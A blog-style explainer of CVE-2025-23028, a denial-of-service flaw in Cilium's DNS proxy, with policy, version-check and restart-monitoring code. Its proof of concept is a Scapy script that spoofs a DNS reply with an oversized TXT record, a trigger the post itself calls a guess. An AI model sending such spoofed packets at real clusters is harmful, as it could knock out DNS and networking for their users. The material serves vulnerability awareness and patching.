Cilium is a popular networking, observability, and security layer for Kubernetes clusters. It uses eBPF, a powerful Linux kernel technology, to manage network traffic and enforce security policies efficiently. Researchers recently disclosed a critical issue, CVE-2025-23028, that lets an attacker outside the cluster crash the Cilium agent by sending a specially crafted DNS response, potentially disrupting networking across your entire cluster.

This post explains the vulnerability in plain English, sketches how the bug might be triggered, and looks at what makes it dangerous, even for hardened Kubernetes installations.

- Vulnerability Type: Denial of Service (DoS)

- Impacted Project: Cilium

CVE details & advisories:

- GitHub Security Advisory (GHSA-f23p-9jmm-wx84)

- Cilium Release/Upgrade Notes

How it works in five points

1. Cilium DNS Proxy: Cilium can act as a DNS proxy for pods and workloads, helping enforce DNS-based network policies.

2. External Attacker: If Cilium is proxying DNS, an attacker outside the cluster who can answer, or spoof answers to, DNS queries sent from inside the cluster can return specially crafted responses.

3. Crash Trigger: When Cilium receives a malicious DNS reply, the agent process handling DNS can crash, causing a denial of service (DoS).

4. Partial Impact: Traffic unrelated to DNS or DNS-based policies may keep flowing, but anything relying on DNS lookups can break.

5. Stuck State: Until the agent is restarted, no policy or configuration changes are applied and new DNS-dependent connections fail; restarting the Cilium agent restores service.
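DNS proxying is driven by policy: in Cilium, an egress rule with an L7 `dns` section sends a pod's lookups through the agent's DNS proxy, and `toFQDNs` rules then allow traffic to the IPs the proxy saw resolved for a name. The sketch below builds such a CiliumNetworkPolicy as a Python dict and prints it as JSON, which `kubectl apply -f` accepts. It follows the common pattern from Cilium's documentation; the policy name, the `app` label, and `api.example.com` are hypothetical placeholders.

```python
import json


def dns_proxy_policy(name: str, app_label: str, allowed_fqdn: str) -> dict:
    """Build a CiliumNetworkPolicy that routes DNS through Cilium's DNS proxy."""
    return {
        "apiVersion": "cilium.io/v2",
        "kind": "CiliumNetworkPolicy",
        "metadata": {"name": name},
        "spec": {
            # Hypothetical selector: applies to pods labelled app=<app_label>.
            "endpointSelector": {"matchLabels": {"app": app_label}},
            "egress": [
                {
                    # Allow lookups to kube-dns; the L7 "dns" rule is what
                    # redirects these queries to the agent's DNS proxy.
                    "toEndpoints": [{
                        "matchLabels": {
                            "k8s:io.kubernetes.pod.namespace": "kube-system",
                            "k8s:k8s-app": "kube-dns",
                        }
                    }],
                    "toPorts": [{
                        "ports": [{"port": "53", "protocol": "ANY"}],
                        "rules": {"dns": [{"matchPattern": "*"}]},
                    }],
                },
                # Allow egress only to IPs the proxy has seen returned for this name.
                {"toFQDNs": [{"matchName": allowed_fqdn}]},
            ],
        },
    }


if __name__ == "__main__":
    # Placeholder values, not taken from the advisory.
    policy = dns_proxy_policy("allow-api", "web", "api.example.com")
    print(json.dumps(policy, indent=2))  # e.g. pipe into: kubectl apply -f -
```

Any workload covered by a policy like this has its DNS answers parsed by the proxy, which is the code path this CVE concerns.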

Attack Scenario

Imagine a Kubernetes pod reaches out to a public DNS server (like 8.8.8.8) to resolve a hostname. An attacker who controls the DNS server answering the query, or who can spoof its responses, sends *back* a deliberately malformed or unexpected DNS response that triggers the bug in Cilium's DNS parser.
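Spoofing only works if the forged packet passes the checks a DNS client applies to incoming answers. The stdlib-only sketch below models those checks on raw DNS bytes: the same 16-bit transaction ID, the QR (response) bit set, and an identical question section. It is a generic illustration of DNS reply matching, not Cilium's code; the helper names are hypothetical, names are assumed uncompressed, and the IP-address and UDP-port match happens at the socket level, outside the DNS payload.

```python
import struct

# Hypothetical helpers: a generic model of DNS reply matching, not Cilium code.


def encode_name(name: str) -> bytes:
    """Encode a domain name as length-prefixed labels ending in a zero byte."""
    return b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split(".")) + b"\x00"


def build_message(txid: int, flags: int, name: str, qtype: int = 1) -> bytes:
    """Build a header plus one question (QCLASS IN) and no answer records."""
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def read_question(msg: bytes) -> tuple:
    """Return (lower-cased name, qtype, qclass); assumes an uncompressed QNAME."""
    labels, offset = [], 12  # the question starts right after the 12-byte header
    while msg[offset] != 0:
        length = msg[offset]
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii").lower())
        offset += 1 + length
    qtype, qclass = struct.unpack("!HH", msg[offset + 1:offset + 5])
    return ".".join(labels), qtype, qclass


def looks_like_reply_to(query: bytes, reply: bytes) -> bool:
    """Matching ID, QR bit set, exactly one question, and the same question."""
    q_id = struct.unpack("!H", query[:2])[0]
    r_id, r_flags, r_qdcount = struct.unpack("!HHH", reply[:6])
    is_response = bool(r_flags & 0x8000)  # QR is the top bit of the flags word
    return (r_id == q_id and is_response and r_qdcount == 1
            and read_question(reply) == read_question(query))


query = build_message(0x1234, 0x0100, "evil.com")     # RD set, QR clear
forged = build_message(0x1234, 0x8180, "evil.com")    # QR, RD, RA set
wrong_id = build_message(0x4321, 0x8180, "evil.com")
print(looks_like_reply_to(query, forged), looks_like_reply_to(query, wrong_id))  # True False
```

In this model a reply carrying the wrong ID fails the check, which is why the PoC takes the query ID as an argument alongside the pod's address and port.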

Proof of Concept with Python and Scapy

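Below is an illustrative snippet that builds a malformed DNS response of the kind that could crash Cilium. The exact malformed field behind CVE-2025-23028 is not reproduced here, so treat this as a guess at the trigger rather than a working exploit. Note that Cilium's DNS proxy runs in the agent's userspace, so this parsing is not done in eBPF.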

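```python
# Requires Scapy and root privileges (raw sockets) to send.
from scapy.all import DNS, DNSQR, DNSRR, IP, UDP, send


def send_malicious_dns_response(target_ip, target_port, query_id, resolver_ip="8.8.8.8"):
    # Suppose Cilium crashes on large, RFC-violating DNS TXT record responses.
    # resolver_ip (hypothetical parameter) must be the server the pod queried;
    # otherwise the spoofed reply will not match the pod's outstanding query.
    dns_response = (
        IP(src=resolver_ip, dst=target_ip)
        / UDP(sport=53, dport=target_port)
        / DNS(id=query_id, qr=1, aa=1, qdcount=1, ancount=1,
              qd=DNSQR(qname="evil.com"),
              an=DNSRR(rrname="evil.com", type="TXT", rdata="A" * 10000))  # absurdly large TXT
    )
    send(dns_response)
    print(f"Malicious DNS response sent to {target_ip}:{target_port}")


# Usage example with placeholder values (you would sniff for real values in an actual attack)
send_malicious_dns_response("10.0.0.10", 12345, 0x1234)
```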
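To see what the PoC puts on the wire without root privileges or sending anything, the sketch below assembles a comparable response using only the standard library. It mirrors the PoC's assumptions (an answer for `evil.com` carrying 10,000 bytes of TXT data, QR and AA set); the function names are hypothetical, and this is not the published trigger. Per RFC 1035, TXT data is a sequence of character-strings of at most 255 bytes, each with a one-byte length prefix, so the payload has to be chunked.

```python
import struct

# Mirrors the PoC's assumed trigger (a huge TXT answer); not the published exploit.


def encode_name(name: str) -> bytes:
    """Encode a domain name as length-prefixed labels ending in a zero byte."""
    return b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split(".")) + b"\x00"


def txt_rdata(text: bytes) -> bytes:
    """Split TXT data into character-strings of at most 255 bytes, each length-prefixed."""
    chunks = [text[i:i + 255] for i in range(0, len(text), 255)]
    return b"".join(bytes([len(chunk)]) + chunk for chunk in chunks)


def oversized_txt_response(txid: int, name: str, size: int) -> bytes:
    """Assemble a one-question, one-answer response carrying `size` bytes of 'A' as TXT."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 0, 0)  # QR=1, AA=1; 1 question, 1 answer
    qname = encode_name(name)
    question = qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    rdata = txt_rdata(b"A" * size)
    # TYPE=TXT (16), CLASS=IN (1), TTL=0, RDLENGTH, then the RDATA itself
    answer = qname + struct.pack("!HHIH", 16, 1, 0, len(rdata)) + rdata
    return header + question + answer


msg = oversized_txt_response(0x1234, "evil.com", 10_000)
print(len(msg))  # 10086
```

At 10,086 bytes the message is roughly twenty times the classic 512-byte limit for DNS over UDP and well above a typical 1,500-byte Ethernet MTU, so it would have to be IP-fragmented in transit.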

Note:

- The real bug might depend on a different malformed section of the DNS packet. The example here sends an absurdly large TXT record, which has previously triggered bugs in similar DNS parsers.

- To spoof a reply, you would need the pod's IP address, its UDP source port, and the query's transaction ID, which in practice means a man-in-the-middle (MITM) position or other on-path network access.
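Why does the attacker need on-path access? Without sniffing, a blind spoofer must guess both the 16-bit transaction ID and the pod's UDP source port. The arithmetic below assumes the pod's resolver picks a random ID and a random source port from Linux's default ephemeral range (32768 to 60999, the usual `net.ipv4.ip_local_port_range` default); real stub resolvers and timing windows vary, so treat it as an order-of-magnitude estimate.

```python
# Assumption: random 16-bit transaction ID plus a random source port drawn from
# Linux's default ephemeral port range.
TXID_SPACE = 2 ** 16
PORT_LOW, PORT_HIGH = 32768, 60999


def blind_spoof_combinations(port_low: int = PORT_LOW, port_high: int = PORT_HIGH) -> int:
    """Number of (transaction ID, source port) pairs a blind spoofer must cover."""
    return TXID_SPACE * (port_high - port_low + 1)


combos = blind_spoof_combinations()
print(f"{combos:,} ID/port pairs; one blind guess succeeds with p = {1 / combos:.1e}")
```

That is about 1.85 billion candidate pairs per query, versus exactly one once the attacker can read the query off the wire.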

Impact

- Existing Traffic: Already-established connections often keep working.

- New Traffic (needing DNS): Any new connection that needs DNS resolution (for example, a new HTTP request to a hostname) will *fail* unless the address is already cached or the client connects by IP directly.

- Agent Down: No policy or configuration changes are applied while the Cilium agent is down, which can escalate into wider networking instability.

- Self-Healing? Kubernetes will typically restart a crashed Cilium agent automatically, but each recovery period still leaves a window for outages.
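Because a crash shows up as a container restart, one way to spot this kind of DoS is to watch the Cilium agent pods' restart counts. The sketch below parses the JSON printed by `kubectl -n kube-system get pods -l k8s-app=cilium -o json` and reports agents that have restarted. The namespace and `k8s-app=cilium` label assume a default installation, the function names are hypothetical, and a restart alone does not prove exploitation.

```python
import json


def agent_restart_counts(pods_json: str) -> dict:
    """Map each Cilium agent pod name to the sum of its containers' restart counts.

    Expects the output of (default install assumed):
        kubectl -n kube-system get pods -l k8s-app=cilium -o json
    """
    counts = {}
    for pod in json.loads(pods_json).get("items", []):
        statuses = pod.get("status", {}).get("containerStatuses", [])
        counts[pod["metadata"]["name"]] = sum(s.get("restartCount", 0) for s in statuses)
    return counts


def restarted_agents(pods_json: str, threshold: int = 1) -> list:
    """Sorted names of agents whose restart count is at or above `threshold`."""
    return sorted(name for name, n in agent_restart_counts(pods_json).items() if n >= threshold)


# Made-up sample data for illustration only.
sample = json.dumps({"items": [
    {"metadata": {"name": "cilium-abcde"},
     "status": {"containerStatuses": [{"name": "cilium-agent", "restartCount": 3}]}},
    {"metadata": {"name": "cilium-fghij"},
     "status": {"containerStatuses": [{"name": "cilium-agent", "restartCount": 0}]}},
]})
print(restarted_agents(sample))  # ['cilium-abcde']
```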

References



- Cilium Security Advisory: CVE-2025-23028

- Cilium DNS Proxy Documentation

- eBPF Project Site

Conclusion

CVE-2025-23028 is a critical real-world reminder that "smart" proxies like Cilium's DNS handler can be attack targets, even when your eBPF rules are complex and robust. If you run Cilium with DNS proxying enabled on an affected version, upgrade right now to 1.14.18, 1.15.12, or 1.16.5 (whichever matches your release line), especially if your cluster is production-facing.
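A quick way to check a fleet against the fixed releases listed above is to compare each agent's version with the fixed patch level for its release line. The helper below is a minimal sketch: it only knows the three lines this post names (1.14, 1.15, 1.16) and returns `None` for anything else, and it strips pre-release suffixes, so `1.16.5-rc.1` is treated as `1.16.5`, which may be wrong for release candidates. How you obtain the version string (for example, from the agent's image tag) is up to you.

```python
from typing import Optional

# Fixed patch release per minor line, as listed in this post; other lines not covered.
FIXED_PATCH = {(1, 14): 18, (1, 15): 12, (1, 16): 5}


def parse_version(version: str) -> tuple:
    """Turn 'v1.15.11' or '1.15.11-rc.1' into (1, 15, 11); suffixes are ignored."""
    core = version.strip().lstrip("v").split("-")[0]
    major, minor, patch = (int(part) for part in core.split(".")[:3])
    return major, minor, patch


def has_fix(version: str) -> Optional[bool]:
    """True/False for the 1.14 to 1.16 lines; None for release lines not covered here."""
    major, minor, patch = parse_version(version)
    fixed = FIXED_PATCH.get((major, minor))
    if fixed is None:
        return None
    return patch >= fixed


for v in ["1.14.17", "v1.15.12", "1.16.4", "1.13.9"]:
    print(v, has_fix(v))
```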

Don’t wait until your workloads stop resolving hostnames and users lose access—patch today!

*If you found this breakdown useful, or want more exclusive deep-dives, let us know which CVE we should unpack next!*

Timeline

Published on: 01/22/2025 17:15:13 UTC

Last modified on: 02/18/2025 20:15:27 UTC